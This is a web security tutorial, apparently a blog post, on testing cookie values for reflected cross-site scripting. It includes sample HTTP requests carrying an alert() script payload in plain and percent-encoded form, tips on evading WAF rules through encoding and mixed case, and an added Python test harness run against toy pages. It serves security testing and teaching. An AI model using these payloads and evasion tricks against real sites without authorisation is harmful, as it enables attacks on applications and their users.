When we think of Cross-Site Scripting, we often forget to test the cookies. We usually test the parameters in the URL query string or the POST body, and spend most of our time on something like this:

domain.com/registration/index.php?param=1337"><script>alert(httphacker)</script>


Cookies are one of the least-tested inputs of a web application (other request headers, such as Referer and User-Agent, are another), yet the server reads them and often reflects them back just like any other parameter. You can edit them inline with Burp Suite's Proxy Intercept, or with a cookie-editor extension for Firefox or Chrome, to manipulate cookie values while testing a site. Here is an example of a cookie variable to manipulate when testing for XSS:

Original Request:
GET /registration/index.php HTTP/1.1
Accept: */*
Referer: domain.com/registration/
Accept-Language: en-US
User-Agent: Mozilla/4.0
Accept-Encoding: gzip, deflate
Host: domain.com
Pragma: no-cache
Connection: Keep-Alive
Cookie: oAuth[access_token]=a9s87dfaks9j;PHPSESSID=k04mk749i6cur91k;


Cross-Site Cookie Injection: (Un-encoded)
GET /registration/index.php HTTP/1.1
Accept: */*
Referer: domain.com/registration/
Accept-Language: en-US
User-Agent: Mozilla/4.0
Accept-Encoding: gzip, deflate
Host: domain.com
Pragma: no-cache
Connection: Keep-Alive
Cookie: oAuth[access_token]=1337"><script>alert(httphacker)</script>;PHPSESSID=k04mk749i6cur91k;

Cross-Site Cookie Injection: (Encoded)
GET /registration/index.php HTTP/1.1
Accept: */*
Referer: domain.com/registration/
Accept-Language: en-US
User-Agent: Mozilla/4.0
Accept-Encoding: gzip, deflate
Host: domain.com
Pragma: no-cache
Connection: Keep-Alive
Cookie: oAuth[access_token]=%31%33%33%37%22%3e%3c%73%43%72%49%70%54%3e%61%6c%65%72%74%28%68%74%74%70%68%61%63%6b%65%72%29%3c%2f%73%43%72%49%70%54%3e;PHPSESSID=k04mk749i6cur91k;


By replacing the oAuth[access_token] value with the injection string, I was able to execute a script: the application reads the cookie and writes it back into the page without output encoding. Keep in mind that a cookie-reflected XSS is only exploitable against other users if the attacker can get that cookie set in the victim's browser (for example from a sibling subdomain or through another injection), so note how the value reaches the cookie when you report it.

[image: xss]

Test every variable presented in the cookie, not just the oAuth one (PHPSESSID, ASPSESSIONID and the like). It also helps to test both forms, un-encoded and fully URL-encoded: PHP (and many other server stacks) decodes cookie values before the application sees them, so the encoded payload reaches the same sink, but it may slip past a Web Application Firewall rule that only matches the literal string; the mixed-case sCrIpT in the encoded request above serves the same purpose. Comparing which variant gets blocked tells you what the WAF rules match on and gives you clues on how to bypass or evade it. Just remember: the next time you're checking for XSS, don't forget about the cookies!
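The test loop described above, as an added example written for this edit and not code from the original post. It encodes the payload the way the encoded request above does (every byte as %XX), builds the Cookie header, sends the un-encoded and encoded variants, and checks whether the decoded payload comes back unescaped. `vulnerable_page` and `hardened_page` are hypothetical stand-ins for the registration page that mimic how PHP populates $_COOKIE from the header; `BASE_COOKIES`, `TARGET_COOKIE` and the page renderers are constructed for the example. In a real test, replace the page function with one that sends the request and returns the response body.

```python
"""Cookie-based XSS test helpers (added example, not from the original post).

Hypothetical names: TARGET_COOKIE, PAYLOAD, BASE_COOKIES and the two toy page
renderers stand in for the real /registration/index.php that the post tested.
"""
from html import escape
from urllib.parse import unquote

TARGET_COOKIE = "oAuth[access_token]"
# The post's payload, in the mixed-case form its encoded request decodes to.
PAYLOAD = '1337"><sCrIpT>alert(httphacker)</sCrIpT>'

# Constructed baseline matching the post's original request.
BASE_COOKIES = {"oAuth[access_token]": "a9s87dfaks9j", "PHPSESSID": "k04mk749i6cur91k"}


def percent_encode_all(s: str) -> str:
    """Encode every byte as %XX, not just reserved characters, exactly as the
    post's encoded request does; WAF signatures that key on literal '<script'
    do not see the tag in this form."""
    return "".join(f"%{b:02x}" for b in s.encode("utf-8"))


def build_cookie_header(cookies: dict) -> str:
    """Serialise a name->value mapping into a Cookie header value
    (trailing ';' kept to match the captured requests)."""
    return ";".join(f"{k}={v}" for k, v in cookies.items()) + ";"


def parse_cookie_header(header: str) -> dict:
    """Split a Cookie header the way PHP fills $_COOKIE: on ';', then name=value
    at the first '=', URL-decoding both. (PHP additionally turns
    'oAuth[access_token]' into a nested array; flattened here.)"""
    jar = {}
    for part in header.split(";"):
        part = part.strip()
        if not part or "=" not in part:
            continue
        name, _, value = part.partition("=")
        jar[unquote(name.strip())] = unquote(value)
    return jar


def vulnerable_page(cookie_header: str) -> str:
    """Toy equivalent of a PHP page doing echo $_COOKIE[...] inside an attribute."""
    token = parse_cookie_header(cookie_header).get(TARGET_COOKIE, "")
    return f'<input type="hidden" name="token" value="{token}">'


def hardened_page(cookie_header: str) -> str:
    """Same page with htmlspecialchars-style output encoding (quotes included)."""
    token = parse_cookie_header(cookie_header).get(TARGET_COOKIE, "")
    return f'<input type="hidden" name="token" value="{escape(token, quote=True)}">'


def reflected_unescaped(body: str, payload: str) -> bool:
    """True when the decoded payload appears verbatim, i.e. the value breaks out
    of its HTML context; an escaped reflection (&lt;sCrIpT&gt;) is not a finding."""
    return payload in body


def run_cookie_xss_test(page, base_cookies: dict) -> dict:
    """Try the un-encoded and fully-encoded payload in TARGET_COOKIE against
    `page` (a callable taking the Cookie header value and returning the
    response body) and report which variants come back unescaped."""
    results = {}
    variants = (("unencoded", PAYLOAD), ("encoded", percent_encode_all(PAYLOAD)))
    for label, value in variants:
        cookies = {**base_cookies, TARGET_COOKIE: value}
        body = page(build_cookie_header(cookies))
        results[label] = reflected_unescaped(body, PAYLOAD)
    return results


if __name__ == "__main__":
    print("vulnerable:", run_cookie_xss_test(vulnerable_page, BASE_COOKIES))
    print("hardened:  ", run_cookie_xss_test(hardened_page, BASE_COOKIES))
```

Both variants reflect unescaped on the vulnerable page because the cookie is decoded before it reaches the echo; on the hardened page neither does. When the real target blocks only the un-encoded request, the difference is the WAF, not the application, and that is the clue the last paragraph refers to.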